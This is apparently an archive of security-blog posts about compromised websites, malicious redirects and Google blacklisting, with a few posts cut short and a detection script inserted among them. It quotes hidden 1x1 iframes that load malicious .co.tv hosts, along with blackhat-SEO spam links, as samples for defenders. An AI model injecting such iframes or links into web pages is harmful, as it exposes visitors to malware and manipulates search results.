Web Hosting Provider ServerPro Hacked, Defaced, & Blacklisted by Google

Even the pros are susceptible to attack. Web hosting provider ServerPro has been compromised and completely defaced. This has been ongoing for more than a few days with no resolution.

ServerPro boasts over 200,000 clients over a 10-year span. Although there is no direct proof that this attack affects a wide portion of their client base, we have seen a few of their clients experiencing the same issue.

If you were to visit the site, which we recommend against, you would get the beautiful Google infection banner:

ServerPro Blacklisted by Google


Blacklist Warnings for Users of the Stream-Video-Player WordPress Plugin

If you are using the plugin stream-video-player, it might be a good idea to disable this plugin for now.

The plugin loads a Flash player from “http://rod.gs/_SVP/5.7.1896/player.swf?ver=1.3.2”, a domain (rod.gs) which is currently blacklisted by Google, so anyone visiting your site will get the cross-site warning message. Since it is a popular plugin (with more than 100k downloads), this could be affecting quite a few websites.


Ask Sucuri: How Long Does It Take For a Site To Be Removed From Google’s Blacklist? – Updated

If you have any questions about malware, blacklisting, or security in general, send them over to us at contact@sucuri.net and we will answer here. For all the “Ask Sucuri” answers, click here.

This is an update to our previous post about Google blacklisting. We have some updated numbers to share.

Question: My site was hacked and we cleaned and secured it properly. We also scanned it, and it is showing up as clean. However, it is still blacklisted by Google. How long until they remove us?

Answer: This is a very common question. In fact, every time we clear a hacked site, its owner asks us the same question: How long until that scary red warning sign is gone?

To give a solid answer to our clients, we started to time how long it takes from when the review submission is requested, until the site is reviewed and removed by Google. We have now measured a few hundred blacklist removals and we have some good numbers to back up our tests.

Current Results:

  • Average time from submission to removal: 440 minutes (about 7 hours)
  • Maximum time: 792 minutes (about 13 hours)
  • Minimum time: 290 minutes (a bit less than 5 hours)

On average, it takes Google around 7 hours to clear your “bad” website from their lists. For our lucky clients, it takes roughly 5-6 hours. Another important point that some people forget is that you need to request a review! Google will not automatically remove a site once cleaned.

How do you increase your odds of getting cleared faster?

  1. Make sure to clean everything up!
  2. Do not remove the infected files, fix them. If you remove them, they will 404, and a 404 will delay the verification (even if you need to leave the file with a 0-size, don’t remove it until after the site is de-listed).
  3. Follow best practices to increase security on your site so that you minimize the risk of reinfection.

That’s it. Let us know if you have any questions or comments.



GoDaddy shared servers compromised – .htaccess redirection to sokoloperkovuskeci.com

We are seeing many sites hosted on GoDaddy shared servers getting compromised today (and for the last few days) with a conditional redirection to sokoloperkovuskeci.com. This is what it looks like on our scanner:

Suspicious conditional redirect.
Details: http://sucuri.net/malware/entry/MW:HTA:7
Redirects users to:http://sokoloperkovuskeci.com/in.php?g=1105

This is caused by this entry that is added to the .htaccess file of the compromised sites:



Google blocks .co.cc, attackers are now using .co.tv

It is being reported that Google took action against the high number of malware sites in the .co.cc domain, removing more than 11 million sites from their search results.

For us this is good news, since we haven’t been seeing anything good coming from there (only malware and spam). They did a similar thing a few weeks ago, blacklisting the whole .cz.cc domain.

However, just as they blacklisted the .co.cc, we are starting to see the attackers switching tactics and using different free domains. The popular one now is .co.tv:

<iframe src="http://uhcmsgfq.co.tv/?go=1" width="1" height="1"></iframe>

<iframe src="http://yswlifofj.co.tv/?go=1" width="1" height="1"></iframe> 

<iframe width="1" height="1" src="http://vmvfonc.co.tv/?go=1"></iframe>

<iframe src="http://cvfplmpsap.co.tv/?go=1" width="1" height="1"></iframe>

<iframe src="http://kwhnqxvslf.co.tv/?go=1" width="1" height="1"></iframe>

Those are just some of the malicious iframes we are seeing on hacked sites now (a few weeks ago they would have been on the .co.cc domain). As you can see by their names (vmvfonc.co.tv, kwhnqxvslf.co.tv, yswlifofj.co.tv, etc.), they are random and being mass generated.

We are also seeing a lot of malware and spam in the .co.be domain range (like dumoxoveba21.co.be), but it seems Google banned the whole .co.be range as well.
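A way to check your own pages for this pattern, as an added example that is not code from the original post: it flags iframes that are invisible (1x1 or hidden with CSS) or whose host sits under one of the free zones named above. The sample page and the example.* hosts are constructed; the 0-or-1 size threshold and the CSS checks are assumptions.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Free second-level zones the post names as abused by attackers.
FREE_ZONES = (".co.cc", ".co.tv", ".cz.cc", ".co.be")

def _tiny(value):
    """True when a width/height attribute is 0 or 1 (an optional 'px' is ignored)."""
    v = (value or "").strip().lower()
    v = v[:-2] if v.endswith("px") else v
    return v.isdigit() and int(v) <= 1

class IframeFinder(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = dict(attrs)
        host = (urlparse(a.get("src") or "").hostname or "").lower()
        style = (a.get("style") or "").replace(" ", "").lower()
        hidden = (_tiny(a.get("width")) and _tiny(a.get("height"))) \
            or "display:none" in style or "visibility:hidden" in style
        free_zone = host.endswith(FREE_ZONES)
        if hidden or free_zone:
            self.findings.append({"line": self.getpos()[0], "host": host,
                                  "hidden": hidden, "free_zone": free_zone})

def scan(html):
    """Return one finding per suspicious iframe in an HTML document."""
    finder = IframeFinder()
    finder.feed(html)
    finder.close()
    return finder.findings

# Constructed sample page: one normal embed, one iframe in the style quoted in
# the post, one hidden with CSS. The example.* hosts are placeholders.
SAMPLE = """<html><body>
<p>Welcome</p>
<iframe src="https://player.example.com/embed/1" width="560" height="315"></iframe>
<iframe width="1" height="1" src="http://vmvfonc.co.tv/?go=1"></iframe>
<iframe src="http://tracker.example.net/x" style="display: none"></iframe>
</body></html>"""

if __name__ == "__main__":
    print(scan(SAMPLE))
```

A hidden iframe is not always malicious, so treat each finding as something to review against what your templates and plugins are supposed to embed.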

What Google is doing is good, but the “war” is not over :)


If you are worried your site might be hacked or compromised, scan it here: http://sitecheck.sucuri.net.

Google blacklisted all the .cz.cc domains

It seems that Google just blacklisted all the sites under the .cz.cc main domain (including the nic.cz.cc, start.cz.cc and all others). In their status page Google says:

Has this site acted as an intermediary resulting in further distribution of malware?

 
Over the past 90 days, cz.cc appeared to function as an intermediary for the infection of 13788 site(s) including uniform-net.jp/, nuxi-navi.com/, flashracingonline.com/.

 
Has this site hosted malware?

 
Yes, this site has hosted malicious software over the past 90 days. It infected 47193 domain(s), including razym.ru/, discuss.com.hk/, lnk.by/.

So according to Google, they infected more than 47 thousand domains. It is interesting because in the last few months the .cc TLD has been the most used by attackers, but it seems that Google decided to just blacklist everything (probably by mistake).

You can see this warning by checking the status page on Google for any site ending in .cz.cc: http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http://anysite.cz.cc/

What is the current listing status for cz.cc?

Site is listed as suspicious – visiting this web site may harm your computer.

Part of this site was listed for suspicious activity 2907 time(s) over the past 90 days.

We will post more details if we hear back from Google.

TheWebbyAwards hacked and compromised with Blackhat SEO

The WebbyAwards web site (www.webbyawards.com/) is currently hacked and compromised with Blackhat SEO. If you try to search for it on Google you will get a warning saying that “This site may be compromised”:

And if you look at the source code of the page, you will see thousands of hidden spam links in there (about selling Windows Vista, buying Office, etc.) pointing to gl.iit.edu:8080, www.korea.edu, www.gefassembly.org, www.ncsconline.org and car.dost.gov.ph. Yes, all “important” and high PR sites (one university, two .gov sites, etc.).

<a href="http://gl.iit.edu:8080/id=8085=WHERE-CAN-I-BUY-WINDOWS-7.html">where can i buy windows 7</a>..

<a href="http://gl.iit.edu:8080/id=1974=BUY-MICROSOFT-OFFICE-2007-FOR.html">buy microsoft office 2007 for windows</a>

<a href="http://www.korea.edu/m02/m02_06_03.php?3142=Windows-Vista-Price.php">windows vista price at targe..

<a href="http://www.gefassembly.org/administrator/modules/mod_title/mod_title.php?id=3387=COMPRAR-OFFICE-2007.aspx">comprar office 200..

<a href="http://car.dost.gov.ph/libraries/phpgacl/.gacl.php?5656=Windows-7-Ultimate-(64-Bit).php">cheap upgrade to windows ..

If you also search on Google for some of these terms (like “windows vista price at targe” ), you will see webby.aol.com (webbyawards.com) in the top pages already (along with some .gov and .edu web sites).

We have no details on how it was compromised yet, but we will keep you posted (if we hear back from them). If you are a site owner, take this as a reminder to make sure that all your sites are updated, using good passwords, monitored and following the best practices.



Mass infections – globalpoweringgathering.com

We first detected malware from globalpoweringgathering.com almost a month ago, and posted on our blog about it. But in the last few days, we started to see a big increase in the number of sites infected with it.

We were able to catalog almost 3 thousand sites with this malware and Google lists almost 2 thousand sites in their safe browsing page (and it is growing each day – just yesterday it was less than 1 thousand):

Has this site hosted malware?

Yes, this site has hosted malicious software over the past 90 days. It infected 1815 domain(s), including clonestop.com/, warseer.com/, showbiz411.com/.



CBS Money Watch / ZDnet hacked and blacklisted by Google

We are getting reports that the CBS Money Watch and some ZDNet web sites are currently distributing malware and are blacklisted by Google. We are still investigating it, but if you try to visit the CBS Money Watch site (moneywatch.com), you will get a warning from Google:




Ask Sucuri: How long it takes for a site to be removed from Google’s blacklist?

If you have any questions about malware, blacklisting, or security in general, send them to us at contact@sucuri.net and we will answer here. For all the “Ask Sucuri” answers, go here.

Question: My site was hacked and we cleaned and secured it properly. We also scanned it, and it is showing up as clean, however, it is still blacklisted by Google. How long until they remove us?

This is a very common question. In fact, every time we clear a hacked site, its owner asks us the same question: How long until that scary red warning sign is gone?

To give a solid answer to our clients, for the last few months we started to time how long it takes from when the review submission is requested, until the site is removed by Google. We have now timed more than 500 blacklist removals so I think we have some good numbers to back us up.

Here are the results: